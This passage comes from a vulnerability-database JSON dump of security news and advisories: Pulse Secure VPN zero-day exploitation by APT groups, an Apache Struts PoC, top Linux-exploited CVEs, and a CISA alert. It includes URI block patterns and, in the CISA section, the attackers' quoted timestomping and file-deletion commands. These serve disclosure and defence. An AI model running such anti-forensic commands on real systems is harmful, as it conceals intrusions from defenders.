[**CVE-2019-0230**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0230>) (CVSS score: 9.8) - Apache Struts 2 RCE vulnerability\n * [**CVE-2018-11776**](<https://nvd.nist.gov/vuln/detail/CVE-2018-11776>) (CVSS score: 8.1) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2020-7961**](<https://nvd.nist.gov/vuln/detail/CVE-2020-7961>) (CVSS score: 9.8) - Liferay Portal untrusted deserialization vulnerability\n\n[](<https://thehackernews.com/images/-CcxYro041Ss/YSOhRgK85gI/AAAAAAAADmo/EddtTNpqRVsnxWJ2QLdym3CSkEJDwcSggCLcBGAsYHQ/s0/report-1.jpg>)\n\n[](<https://thehackernews.com/images/-p0iNN7yORLk/YSOhRABhMqI/AAAAAAAADmk/RQED6fXWrDkadRhDxqU0JzZOoWwJePPkQCLcBGAsYHQ/s0/report-.jpg>)\n\nEven more troublingly, the 15 most commonly used Docker images on the official Docker Hub repository has been revealed to harbor hundreds of vulnerabilities spanning across python, node, wordpress, golang, nginx, postgres, influxdb, httpd, mysql, debian, memcached, redis, mongo, centos, and rabbitmq, underscoring the need to [secure containers](<https://www.trendmicro.com/vinfo/us/security/news/security-technology/container-security-examining-potential-threats-to-the-container-environment>) from a wide range of potential threats at each stage of the development pipeline.\n\n\"Users and organizations should always apply security best practices, which include utilizing the security by design approach, deploying multilayered virtual patching or vulnerability shielding, employing the principle of least privilege, and adhering to the shared responsibility model,\" the researchers concluded.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-23T13:27:00", "type": "thn", "title": "Top 15 Vulnerabilities Attackers Exploited Millions of Times to Hack Linux Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4547", "CVE-2017-12611", "CVE-2017-5638", "CVE-2017-7657", "CVE-2017-9805", "CVE-2018-11776", "CVE-2018-7600", "CVE-2019-0230", "CVE-2020-11651", "CVE-2020-14179", "CVE-2020-14750", "CVE-2020-17496", "CVE-2020-25213", "CVE-2020-7961", "CVE-2021-29441"], "modified": "2021-08-23T13:27:54", "id": "THN:7FD924637D99697D78D53283817508DA", "href": "https://thehackernews.com/2021/08/top-15-vulnerabilities-attackers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-04-21T15:44:32", "description": "A critical zero-day security vulnerability in Pulse Secure VPN devices has been exploited by nation-state actors to launch cyberattacks against U.S. defense, finance and government targets, as well as victims in Europe, researchers said.\n\n[](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)\n\nDownload \u201cThe Evolution of Ransomware\u201d to gain valuable insights on emerging trends amidst rapidly growing attack volumes. Click above to hone your defense intelligence!\n\nThe flaw, tracked as CVE-2021-22893, allows remote code-execution (RCE) and is being used in the wild to gain administrator-level access to the appliances, according to Ivanti research. Pulse Secure said that the zero-day will be patched in early May; but in the meantime, the company worked with Ivanti (its parent company) to release both mitigations and the [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/pkb_mobile#article/l:en_US/KB44755/s>), to help determine if systems have been impacted.\n\n\u201cThe investigation shows ongoing attempts to exploit four issues: The substantial bulk of these issues involve three vulnerabilities that were patched in 2019 and 2020: [Security Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) (CVE-2019-11510), [Security Advisory SA44588](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44588>) (CVE-2020-8243) and [Security Advisory SA44601](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601>) (CVE-2020-8260),\u201d according to a Pulse Secure statement provided to Threatpost. \u201cThe new issue, discovered this month, impacted a very limited number of customers.\u201d\n\n## **CVE-2021-22893: A Zero-Day in Pulse Connect Secure VPNs**\n\nThe newly discovered critical security hole is rated 10 out of 10 on the CVSS vulnerability-rating scale. It\u2019s an authentication bypass vulnerability that can allow an unauthenticated user to perform RCE on the Pulse Connect Secure gateway. It \u201cposes a significant risk to your deployment,\u201d according to the advisory, [issued Tuesday](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>).\n\n\u201cThe ongoing COVID-19 crisis resulted in an overnight shift to remote work culture, and VPNs played a critical role to make this possible,\u201d Bharat Jogi, senior manager of vulnerability and threat research at Qualys, said via email. \u201cVPNs have become a prime target for cybercriminals and over the past few months.\u201d\n\n\u201cThe Pulse Connect Secure vulnerability with CVE-2021-22893\u2026can be exploited without any user interaction,\u201d he added.\n\nThe mitigations involve importing a file called \u201cWorkaround-2104.xml,\u201d available on the advisory page. It disables the Windows File Share Browser and Pulse Secure Collaboration features on the appliance.\n\nUser can also use the blacklisting feature to disable URL-based attacks, the firm noted, by blocking the following URIs:\n\n * ^/+dana/+meeting\n * ^/+dana/+fb/+smb\n * ^/+dana-cached/+fb/+smb\n * ^/+dana-ws/+namedusers\n * ^/+dana-ws/+metric\n\n\u201cThe Pulse Connect Secure (PCS) team is in contact with a limited number of customers who have experienced evidence of exploit behavior on their PCS appliances,\u201d according to Pulse Secure. \u201cThe PCS team has provided remediation guidance to these customers directly.\u201d\n\nAccording to tandem research from Mandiant, this and the other bugs are at the center of a flurry of activity by different threat actors, involving 12 different malware families overall. The malware is used for authentication-bypass and establishing backdoor access to the VPN devices, and for lateral movement. Two specific advanced persistent threat (APT) groups, UNC2630 and UNC2717, are particularly involved, researchers said.\n\n## **UNC2630 Cyber-Activity: Links to China**\n\n\u201cWe observed UNC2630 harvesting credentials from various Pulse Secure VPN login flows, which ultimately allowed the actor to use legitimate account credentials to move laterally into the affected environments,\u201d according to Mandiant, in a [Tuesday posting](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>). \u201cIn order to maintain persistence to the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts on the VPN appliance.\u201d\n\nThe firm tracks those tools as the following:\n\n * **SlowPulse:** Trojanized shared objects with malicious code to log credentials and bypass authentication flows within the legitimate Pulse Secure shared object libdsplibs.so, including multifactor authentication requirements.\n * **RadialPulse and PulseCheck:** Web shells injected into legitimate, internet-accessible Pulse Secure VPN appliance administrative web pages.\n * **ThinBlood:** A utility used to clear relevant log files.\n * **Other capabilities:** Toggling the filesystem between Read-Only and Read-Write modes to allow for file modification on a typically Read-Only filesystem; the ability to maintain persistence across VPN appliance general upgrades that are performed by the administrator; and the ability to unpatch modified files and delete utilities and scripts after use to evade detection.\n\nUNC2630 targeted U.S. defense-sector companies as early as last August, Mandiant noted. It added that the activity could be state-sponsored, likely backed by China.\n\n\u201cWe suspect UNC2630 operates on behalf of the Chinese government and may have ties to APT5,\u201d according to the analysis. \u201cUNC2630\u2019s combination of infrastructure, tools, and on-network behavior appear to be unique, and we have not observed them during any other campaigns or at any other engagement. Despite these new tools and infrastructure, Mandiant analysts noted strong similarities to historic intrusions dating back to 2014 and 2015 and conducted by Chinese espionage actor APT5.\u201d\n\nAPT5 consistently targets defense and technology companies in the Asia, Europe and the U.S., Mandiant noted.\n\n\u201c[It] has shown significant interest in compromising networking devices and manipulating the underlying software which supports these appliances,\u201d Mandiant researchers said. \u201cAPT5 persistently targets high value corporate networks and often re-compromises networks over many years. Their primary targets appear to be aerospace and defense companies located in the U.S., Europe, and Asia. Secondary targets (used to facilitate access to their primary targets) include network appliance manufacturers and software companies usually located in the U.S.\u201d\n\n## **The UNC2717 APT Connection**\n\nAs for UNC2717, Mandiant linked Pulse Secure zero-day activity back to the APT in a separate incident in March, targeted against an unnamed European organization. UNC2717 was also seen targeting global government agencies between October and March.\n\nSo far, there\u2019s not enough evidence about UNC2717 to determine government sponsorship or suspected affiliation with any known APT group, Mandiant said.\n\nThe tools used by this group include HardPulse, which is a web shell; PulseJump, used for credential-harvesting; and RadialPulse. The firm also observed a new malware that it calls LockPick, which is a trojanized OpenSSL library file that appears to weaken encryption for communications used by the VPN appliances.\n\nAll of the malware families in use in the campaigns appear to be loosely related, according to Mandiant.\n\n\u201cAlthough we did not observe PulseJump or HardPulse used by UNC2630 against U.S. [defense] companies, these malware families have shared characteristics and serve similar purposes to other code families used by UNC2630,\u201d researchers said.\n\nThey added, \u201cMandiant cannot associate all the code families described in this report to UNC2630 or UNC2717. We also note the possibility that one or more related groups is responsible for the development and dissemination of these different tools across loosely connected APT actors.\u201d\n\n## **Pulse Secure: A Favorite Target for APTs**\n\nPulse Secure VPNs continue to be a hot target for nation-state actors. Last week, [the FBI warned](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>) that a known arbitrary file-read Pulse Secure bug (CVE-2019-11510) was part of five vulnerabilities under attack by the Russia-linked group known as APT29 (a.k.a. Cozy Bear or The Dukes). APT29 is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access,\u201d according to the Feds.\n\nMeanwhile, earlier in April, the Department of Homeland Security (DHS) urged companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, because in many cases, attackers have already exploited CVE-2019-11510 to hoover up victims\u2019 credentials \u2013 and now are using those credentials to move laterally through organizations, [DHS warned](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>).\n\nAnd last fall, the Cybersecurity and Infrastructure Security Agency (CISA) said that a federal agency had suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network. Once again, [CVE-2019-11510 was in play](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>), used to gain access to employees\u2019 legitimate Microsoft Office 365 log-in credentials and sign into an agency computer remotely.\n\n\u201cAlmost without fail, the common thread with any APT is the exploitation of known vulnerabilities both new and old,\u201d Yaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, said via email. \u201cMalicious activity, whether using a supply-chain vector or a VPN authentication bypass, is thwarted by good cyber-hygiene practices and serious blue teaming. Vulnerability management, or more importantly vulnerability remediation, is a cybersecurity dirty job that is under-resourced and underappreciated and businesses are paying the price.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook,** **_\u201c[2021: The Evolution of Ransomware](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>),\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and [DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now \u2013 on us!**\n", "cvss3": {}, "published": "2021-04-21T15:35:37", "type": "threatpost", "title": "Pulse Secure Critical Zero-Day Security Bug Under Active Exploit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-22893"], "modified": "2021-04-21T15:35:37", "id": "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A", "href": "https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:21:14", "description": "Proof-of-concept exploit code surfaced on GitHub on Friday, raising the stakes on two existing Apache Struts 2 bugs that allow for remote code-execution and denial-of-service attacks on vulnerable installations.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding the two bugs, tracked as [CVE-2019-0230](<https://cwiki.apache.org/confluence/display/WW/S2-059>) and [CVE-2019-0233](<https://cwiki.apache.org/confluence/display/WW/S2-060>). Impacted are Apache Struts versions 2.0.0 through 2.5.20. Remediation includes upgrading to Struts 2.5.22, according to the Apache Struts Security Team.\n\nStruts 2 is an open-source coding framework and library for enterprise developers popular with developers and companies when creating Java-based applications. Both the exploitable vulnerabilities in question were fixed last November. \n[](<https://threatpost.com/newsletter-sign/>) \nResearchers have warned of outdated installations of Apache Struts 2 and that [if left unpatched](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>) they can open the door to more critical holes similar to a bug at the root of the [massive Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)).\n\n## **PoC Released to GitHub**\n\nThe proof-of-concept (PoC) [released this week ](<https://github.com/cellanu/cve-2019-0230>)raises the greatest concern with CVE-2019-0230, originally rated important when first uncovered by Matthias Kaiser at Apple Information Security. The bug is triggered when a threat actor sends a malicious Object-Graph Navigation Language (OGNL) expressions that can then open the door for a remote code-execution attack, according to the security bulletin. OGNL is a Java language that can let attackers access data objects, and then use them to create and inject server-side code.\n\n\u201cSuccessful exploitation of the most severe of these vulnerabilities (CVE-2019-0230) could allow for remote code-execution in the context of the affected application. Depending on the privileges associated with the application, an attacker could install programs; view, change or delete data; or create new accounts with full user rights,\u201d according to a bulletin issued Friday by the Multi-State Information Sharing &amp; Analysis Center at the Center for Internet Security.\n\nWhile the PoC attack and exploit posted to GitHub targets CVE-2019-0230, the Apache Struts Security Team also urged users to patch for the DoS bug (CVE-2019-0233). The vulnerability affects the write permissions of file directories that could lead to conditions ripe for a DoS attack.\n\nAccording to the Apache Struts 2 Wiki description of the bug, this flaw can be triggered with a file upload to a Strut\u2019s Action that exposes the file.\n\n\u201cAn attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container\u2019s temp directory to read only, such that subsequent upload actions will fail,\u201d [according the description](<https://cwiki.apache.org/confluence/display/WW/S2-060>).\n\nThe Apache security bulletin recommends upgrading to the most recent version of Apache Struts. It also suggests security teams verify no unauthorized system modifications have occurred on the system before applying the patch, and they run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.\n\n**_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary [Threatpost eBook](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>), 2020 in Security: Four Stories from the New Threat Landscape, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. [Click here to download our eBook now](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)._**\n", "cvss3": {}, "published": "2020-08-14T21:20:01", "type": "threatpost", "title": "PoC Exploit Targeting Apache Struts Surfaces on GitHub", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-5135"], "modified": "2020-08-14T21:20:01", "id": "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "href": "https://threatpost.com/poc-exploit-github-apache-struts/158393/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-05-04T12:27:56", "description": "Pulse Secure has [alerted customers](<https://blog.pulsesecure.net/pulse-connect-secure-security-update/>) to the existence of an exploitable chain of attack against its Pulse Connect Secure (PCS) appliances. PCS provides Virtual Private Network (VPN) facilities to businesses, which use them to prevent unauthorized access to their networks and services.\n\nCybersecurity sleuths Mandiant report that they are tracking &quot;12 malware families associated with the exploitation of Pulse Secure VPN devices&quot; operated by groups using a set of related techniques to bypass both single and multi-factor authentication. Most of the problems discovered by Pulse Secure and Mandiant involve three vulnerabilities that were patched in 2019 and 2020. But there is also a very serious new issue that it says impacts a very limited number of customers.\n\n### The old vulnerabilities\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The patched vulnerabilities are listed as:\n\n * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability. We [wrote](<https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/>) about the apparent reluctance to patch for this vulnerability in 2019.\n * [CVE-2020-8243](<https://nvd.nist.gov/vuln/detail/CVE-2020-8243>) a vulnerability in the Pulse Connect Secure &lt; 9.1R8.2 admin web interface could allow an authenticated attacker to upload a custom template to perform an arbitrary code execution.\n * [CVE-2020-8260](<https://nvd.nist.gov/vuln/detail/CVE-2020-8260>) a vulnerability in the Pulse Connect Secure &lt; 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary code execution using uncontrolled gzip extraction.\n\nThe obvious advice here is to review the Pulse advisories for these vulnerabilities and follow the recommended guidance, which includes changing all passwords in the environments that are impacted.\n\n### The new vulnerability\n\nThe new vulnerability (CVE-2021-22893) is a Remote Code Execution (RCE) vulnerability with a CVSS score of 10\u2014the maximum\u2014and a Critical rating. According to [the Pulse advisory](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>):\n\n> [The vulnerability] includes an authentication by-pass vulnerability that can allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect Secure gateway. This vulnerability has a critical CVSS score and poses a significant risk to your deployment.\n\nThere is no patch for it yet (it is expected to be patched in early May), so system administrators will need to mitigate for the problem for now, rather than simply fixing it. Please don&#x27;t wait for the patch.\n\n### Mitigation requires a workaround\n\nAccording to Pulse Secure, until the patch is available CVE-2021-22893 can be mitigated by importing a workaround file. More details can be found in the company&#x27;s [Security Advisory 44784](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>). Reportedly, the workaround disables Pulse Collaboration, a feature that allows users to schedule and hold online meetings between both Connect Secure users and non-Connect Secure users. The workaround also disables the Windows File Share Browser that allows users to browse network file shares.\n\n### Targets\n\nThe Pulse Connect Secure vulnerabilities including CVE-2021-22893 have been used to target government, defense and financial organizations around the world, but mainly in the US. According to some articles the threat-actors are linked to China. The identified threat actors were found to be harvesting account credentials. Very likely in order to perform lateral movement within compromised organizations&#x27; environments. They have also observed threat actors deploying modified Pulse Connect Secure files and scripts in order to maintain persistence. These modified scripts on the Pulse Secure system are reported to have allowed the malware to survive software updates and factory resets.\n\n### Threat analysis\n\nFireEye&#x27;s Mandiant was involved in the research into these vulnerabilities. It has posted an elaborate analysis of the related malware, which they have dubbed SlowPulse. According to Mandiant, the malware and its variants are &quot;applied as modifications to legitimate Pulse Secure files to bypass or log credentials in the authentication flows that exist within the legitimate Pulse Secure shared object libdsplibs.so&quot;. In their [blogpost](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>) they discuss 4 variants. Interested parties can also find technical details and detections there.\n\n### Networking devices\n\nState sponsored cyber-attacks are often more about espionage than about monetary gain with the exception of sabotage against an enemy state. A big part of the espionage is getting hold of login credentials of those that have access to interesting secret information. Breaking into network devices in a way that can be used to extract login credential is an important strategy in this secret conflict. Keep in mind that attribution is always hard and tricky. You may end up reaching the conclusion they wanted you to reach. Given the targets and the methodology however, it makes sense in this case to look first at state sponsored threat actors.\n\n### Update May 4th\n\nThe Pulse Secure team released a security update to address the issue outlined in [Security Advisory SA44784 (CVE-2021-22893)](<https://kb.pulsesecure.net/pkb_mobile#article/l:en_US/SA44784/s>) impacting the Pulse Connect Secure appliance. It is recommend that customers act urgently to apply the update to ensure they are protected. On that note, Pulse Secure also recommends that customers use the Pulse Security Integrity Checker Tool, a tool for customers to identify malicious activity on their systems, and that they continue to apply and follow recommended guidance for all available security patches.\n\nThe post [Take action! Multiple Pulse Secure VPN vulnerabilities exploited in the wild](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/take-action-multiple-pulse-secure-vpn-vulnerabilities-exploited-in-the-wild/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-21T18:12:15", "type": "malwarebytes", "title": "Take action! Multiple Pulse Secure VPN vulnerabilities exploited in the wild", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-22893"], "modified": "2021-04-21T18:12:15", "id": "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "href": "https://blog.malwarebytes.com/malwarebytes-news/2021/04/take-action-multiple-pulse-secure-vpn-vulnerabilities-exploited-in-the-wild/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ics": [{"lastseen": "2023-09-23T07:15:37", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is aware of compromises affecting a number of U.S. government agencies, critical infrastructure entities, and other private sector organizations by a cyber threat actor\u2014or actors\u2014beginning in June 2020 or earlier related to vulnerabilities in certain Ivanti Pulse Connect Secure products. Since March 31, 2021, CISA and Ivanti have assisted multiple entities whose vulnerable Pulse Connect Secure products have been exploited by a cyber threat actor. These entities confirmed the malicious activity after running the [Pulse Secure Connect Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>). To gain initial access, the threat actor is leveraging multiple vulnerabilities, including [CVE-2019-11510](<https://vulners.com/cve/CVE-2019-11510>), [CVE-2020-8260](<https://vulners.com/cve/CVE-2020-8260>), [CVE-2020-8243](<https://vulners.com/cve/CVE-2020-8243>), and the newly disclosed [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>). The threat actor is using this access to place webshells on the Pulse Connect Secure appliance for further access and persistence. The known webshells allow for a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence through patching.\n\n_**(Updated May 3, 2021)**:_ Ivanti has released [Security Advisory SA44784](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/SA44784/>) addressing [CVE-2021-22893](<https://vulners.com/cve/CVE-2021-22893>) and three additional newly disclosed CVEs\u2014CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900. CISA strongly encourages organizations using Ivanti Pulse Connect Secure appliances to immediately run the [Pulse Secure Connect Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>), update to the [latest software version](<https://blog.pulsesecure.net/>), and investigate for malicious activity.\n\n_**(Updated May 27. 2021):**_ CISA has updated this alert to include new threat actor techniques, tactics, and procedures (TTPs), indicators of compromise (IOCs), and updated mitigations. See Ivanti [KB44755 - Pulse Connect Secure (PCS) Integrity Assurance](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) for updated guidance to ensure the full integrity of your Pulse Connect Secure software.\n\n_**(Updated July 21, 2021):**_ Please see CISA's new Malware Analysis Reports in regards to adversary activity analyzed by CISA that were discovered on Pulse Connect Secure Devices.\n\n * [MAR-10333209-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202a>)\n * [MAR-10333243-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202b>)\n * [MAR-10334057-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202c>)\n * [MAR-10334057-2.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202d>)\n * [MAR-10334587-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202e>)\n * [MAR-10334587-2.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202f>)\n * [MAR-10335467-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202g>)\n * [MAR-10336161-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202h>)\n * [MAR-10336935-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202i>)\n * [MAR-10337580-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202j>)\n * [MAR-10337580-2.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202k>)\n * [MAR-10338401-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202l>)\n * [MAR-10338868-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202m>)\n\n_**(Updated August 11, 2021):**_ Ivanti has released Pulse Connect Secure system software version 9.1R12 to address multiple vulnerabilities that an attacker could exploit to take control of an affected system. CISA encourages organizations to review [Security Advisory SA44858](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858>) and apply the necessary update.\n\n_**(Updated August 24, 2021): **_Please see CISA's new Malware Analysis Reports for analysis of malicious activity discovered on Pulse Secure Connect devices.\n\n * [MAR-10336935-2.v1: Pulse Connect Secure](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236a>)\n * [MAR-10333243-3.v1: Pulse Connect Secure](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236b>)\n * [MAR-10338401-2.v1: Pulse Connect Secure](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236c>)\n * [MAR-10334057-3.v1: Pulse Connect Secure](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236d>)\n * [MAR-10339606-1.v1: Pulse Connect Secure](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236e>)\n\nFor a downloadable list of indicators of compromise (IOCs), see AA21-110A.stix.\n\n### Technical Details\n\nOn March 31, 2021, Ivanti released the [Pulse Secure Connect Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) to detect the integrity of Pulse Connect Secure appliances. Their technical bulletin states:\n\n_We are aware of reports that a limited number of customers have identified unusual activity on their Pulse Connect Secure (PCS) appliances. The investigation to date shows ongoing attempts to exploit vulnerabilities outlined in two security advisories that were patched in 2019 and 2020 to address previously known issues: Security Advisory SA44101 (CVE-2019-11510) and Security Advisory SA44601 (CVE- 2020- 8260). For more information visit KB44764 (Customer FAQ)._\n\n_**(Updated May 27, 2021)**:_ CISA has observed the cyber threat actor performing cleanup as demonstrated by the following:\n\n 1. Threat actor was observed timestomping trojanized umount binary to match timestamps of legitimate binaries attempting to disguise the modifications; the touch command was used to modify the time stamp https://attack.mitre.org/techniques/T1070/006/:\n\n/bin/touch /tmp/data/root/bin/umount -r /tmp/data/root/bin/cp\n\n2\\. The threat actor deleted files from temp directories using \"rm -f\": \n\n/bin/rm -f tmp1 \n/bin/rm -f tmp2\n\n3\\. Timestamps:\n\n**Note: **for context, loop 6 is the active partition and loop 8 is the rollback partition of the device.\n\n**Date ** | Time (GMT) | Partition | Artifact | Activity \n---|---|---|---|--- \n4/13/21 | 5:15:33 | pulse-loop6 | /bin/umount | Content Modification Time \n4/20/21 | 19:09:14 | pulse-loop8 | /bin/umount | Metadata Modification Time \n4/20/21 | 19:09:14 | pulse-loop8 | /bin/umount | Content Modification Time \n4/20/21 | 19:18:49 | pulse-loop6 | /bin/umount | Metadata Modification Time \n4/23/21 | 16:14:48 | pulse-loop6 | /bin/umount | Last Access Time \n5/6/21 | 14:27:20 | pulse-loop8 | /bin/umount | Last Access Time \n4/20/21 | 19:08:01 | pulse-loop6 | /bin/touch | Last Access Time \n4/20/21 | 19:09:14 | pulse-loop8 | /bin/touch | Last Access Time \n \nSecurity firm FireEye has posted more information on their blog, including activity related to actor clean up. See the FireEye blog post, [Re-Checking Your Pulse](<https://www.fireeye.com/blog/threat-research/2021/05/updates-on-chinese-apt-compromising-pulse-secure-vpn-devices.html>), for more information, including activity related to actor cleanup.\n\nThe 